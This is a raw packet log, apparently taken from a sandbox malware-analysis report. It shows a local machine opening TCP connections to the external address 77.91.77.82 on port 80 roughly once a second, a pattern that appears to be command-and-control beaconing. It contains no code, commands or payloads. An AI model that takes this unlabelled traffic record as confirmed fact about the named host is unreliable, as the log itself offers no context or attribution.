                                                                Jul 5, 2024 04:37:25.866811991 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:26.583842993 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:26.583990097 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:26.586811066 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:26.591670036 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:26.811007023 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:26.811064005 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:26.919687033 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:26.920017004 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:26.925137043 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:26.925230026 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:26.925381899 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:26.925447941 CEST804976677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:26.925501108 CEST4976680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:26.930257082 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:27.616909027 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:27.617072105 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:27.618844986 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:27.623655081 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:27.835195065 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:27.835259914 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:27.952559948 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:27.952853918 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:27.957643986 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:27.957741976 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:27.957787037 CEST804976777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:27.957830906 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:27.957830906 CEST4976780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:27.962564945 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:28.666785955 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:28.666872025 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:28.667560101 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:28.672316074 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:28.885418892 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:28.885528088 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:28.997786045 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:28.998111963 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:29.003285885 CEST804976877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:29.003302097 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:29.003360987 CEST4976880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:29.003396988 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:29.003551960 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:29.008404016 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:29.717938900 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:29.717995882 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:29.718662024 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:29.723534107 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:29.944940090 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:29.945031881 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:30.060197115 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:30.060523987 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:30.065483093 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:30.065491915 CEST804976977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:30.065586090 CEST4976980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:30.065596104 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:30.065701008 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:30.071733952 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:30.760668039 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:30.760761023 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:30.761459112 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:30.766292095 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:30.977969885 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:30.978069067 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:31.091594934 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:31.091938019 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:31.096622944 CEST804977077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:31.096688032 CEST4977080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:31.096703053 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:31.096766949 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:31.096893072 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:31.101878881 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:31.833709002 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:31.833816051 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:31.834423065 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:31.839154005 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:32.064276934 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:32.064352989 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:32.169605970 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:32.169929028 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:32.174926043 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:32.174981117 CEST804977177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:32.174994946 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:32.175025940 CEST4977180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:32.175137997 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:32.179873943 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:32.902549982 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:32.902602911 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:32.903347969 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:32.908119917 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:33.128952980 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:33.129007101 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:33.232032061 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:33.232326984 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:33.237165928 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:33.237250090 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:33.237413883 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:33.237585068 CEST804977277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:33.237633944 CEST4977280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:33.242201090 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:33.949287891 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:33.949485064 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:33.950393915 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:33.955224037 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:34.174613953 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:34.174695969 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:34.278930902 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:34.279213905 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:34.283957958 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:34.284015894 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:34.284110069 CEST804977377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:34.284127951 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:34.284154892 CEST4977380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:34.288981915 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:35.025150061 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:35.025211096 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:35.025885105 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:35.030739069 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:35.251574993 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:35.251780033 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:35.357096910 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:35.357311964 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:35.362540007 CEST804977477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:35.362550974 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:35.362600088 CEST4977480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:35.362631083 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:35.362756014 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:35.367749929 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:36.056508064 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:36.056560993 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:36.057226896 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:36.062051058 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:36.273655891 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:36.273740053 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:36.390875101 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:36.391237020 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:36.396105051 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:36.396172047 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:36.396179914 CEST804977577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:36.396229029 CEST4977580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:36.396392107 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:36.401144981 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:37.101370096 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:37.101445913 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:37.102093935 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:37.107017994 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:37.323815107 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:37.323899031 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:37.435178041 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:37.435472965 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:37.440740108 CEST804977677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:37.440794945 CEST4977680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:37.441319942 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:37.441391945 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:37.441503048 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:37.446196079 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:38.164408922 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:38.164496899 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:38.165905952 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:38.172652960 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:38.400042057 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:38.400106907 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:38.513336897 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:38.513609886 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:38.518337965 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:38.518402100 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:38.518486977 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:38.518992901 CEST804977777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:38.519042969 CEST4977780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:38.523288965 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:39.212336063 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:39.212420940 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:39.213088036 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:39.220542908 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:39.431180000 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:39.431262970 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:39.544569016 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:39.544893980 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:39.549819946 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:39.549894094 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:39.550000906 CEST804977877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:39.550048113 CEST4977880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:39.550251007 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:39.564671993 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:40.253124952 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:40.253303051 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:40.254215002 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:40.259561062 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:40.472306967 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:40.472382069 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:40.575752020 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:40.576060057 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:40.583216906 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:40.583290100 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:40.583379030 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:40.588057041 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:40.590447903 CEST804977977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:40.590500116 CEST4977980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:41.287861109 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:41.287918091 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:41.288603067 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:41.293395042 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:41.514116049 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:41.514178038 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:41.622613907 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:41.622936964 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:41.627816916 CEST804978077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:41.627834082 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:41.627886057 CEST4978080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:41.627916098 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:41.628053904 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:41.632771969 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:42.354007959 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:42.354096889 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:42.354763985 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:42.359616041 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:42.576458931 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:42.576550007 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:42.685230017 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:42.685550928 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:42.690398932 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:42.690478086 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:42.690576077 CEST804978177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:42.690622091 CEST4978180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:42.692070007 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:42.696885109 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:43.419336081 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:43.419496059 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:43.420042038 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:43.424770117 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:43.649703026 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:43.649765968 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:43.769334078 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:43.770174026 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:43.774540901 CEST804978277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:43.774713039 CEST4978280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:43.774985075 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:43.775055885 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:43.775224924 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:43.779933929 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:44.494673014 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:44.494736910 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:44.495500088 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:44.500278950 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:44.717470884 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:44.717566013 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:44.825788975 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:44.826093912 CEST4978480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:44.831896067 CEST804978477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:44.831959963 CEST4978480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:44.832113981 CEST4978480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:44.832191944 CEST804978377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:44.832242966 CEST4978380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:44.836997032 CEST804978477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:45.527661085 CEST804978477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:45.527872086 CEST4978480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:45.528738022 CEST4978480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:45.534531116 CEST804978477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:45.747570992 CEST804978477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:45.747638941 CEST4978480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:45.857197046 CEST4978480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:45.857527971 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:45.863226891 CEST804978477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:45.863317013 CEST4978480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:45.863712072 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:45.863778114 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:45.864311934 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:45.873179913 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:46.566370964 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:46.566438913 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:46.567142963 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:46.571980953 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:46.783113956 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:46.783173084 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:46.889167070 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:46.889460087 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:46.894419909 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:46.894484043 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:46.894582033 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:46.894968033 CEST804978577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:46.895016909 CEST4978580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:46.899483919 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:47.619394064 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:47.619575977 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:47.620273113 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:47.625050068 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:47.852102995 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:47.852159023 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:47.966484070 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:47.966821909 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:48.119127035 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:48.119345903 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:48.119514942 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:48.119899035 CEST804978677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:48.119961023 CEST4978680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:48.124300957 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:48.812824011 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:48.812907934 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:48.813637018 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:48.818454981 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:49.030213118 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:49.030262947 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:49.138408899 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:49.138840914 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:49.143682957 CEST804978777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:49.143732071 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:49.143744946 CEST4978780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:49.143795013 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:49.143924952 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:49.148612022 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:49.848337889 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:49.848408937 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:49.849245071 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:49.854017973 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:50.066159964 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:50.066222906 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:50.172126055 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:50.172405005 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:50.177185059 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:50.177247047 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:50.177257061 CEST804978877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:50.177301884 CEST4978880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:50.179145098 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:50.183948040 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:50.893464088 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:50.893531084 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:50.894282103 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:50.900494099 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:51.122097969 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:51.122191906 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:51.232054949 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:51.232368946 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:51.238188982 CEST804978977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:51.238198042 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:51.238257885 CEST4978980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:51.238285065 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:51.238399982 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:51.244221926 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:51.950551033 CEST804979077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:37:51.950607061 CEST4979080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:37:51.951564074 CEST4979080192.168.2.477.91.77.82
